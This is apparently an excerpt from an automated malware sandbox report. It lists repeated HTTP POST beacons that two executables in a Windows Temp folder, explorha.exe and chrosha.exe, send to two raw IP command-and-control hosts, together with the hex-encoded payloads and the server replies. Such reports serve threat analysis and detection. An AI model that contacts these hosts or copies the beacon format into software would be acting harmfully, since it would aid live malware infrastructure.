                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.440407991 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.690629959 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      884192.168.2.550733193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.667876959 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:02.919490099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      885192.168.2.550734193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.054929972 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.299253941 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      886192.168.2.550735193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.279337883 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.530123949 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      887192.168.2.550736193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.559377909 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.815095901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      888192.168.2.550737193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:03.783452988 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.037173033 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      889192.168.2.550738193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.182365894 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.432239056 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      890192.168.2.550739193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.396481037 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.641068935 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      891192.168.2.550740193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.681428909 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.931333065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      892192.168.2.550741193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:04.892939091 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:05.145104885 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      893192.168.2.550743193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:05.308123112 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:05.562213898 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      894192.168.2.550744193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:05.506942987 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:05.750025988 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      895192.168.2.550745193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:05.914108992 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.158916950 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      896192.168.2.550746193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.002943993 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.251528978 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      897192.168.2.550747193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.409559965 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.660788059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      898192.168.2.550748193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.609671116 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:06.858450890 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      899192.168.2.550749193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
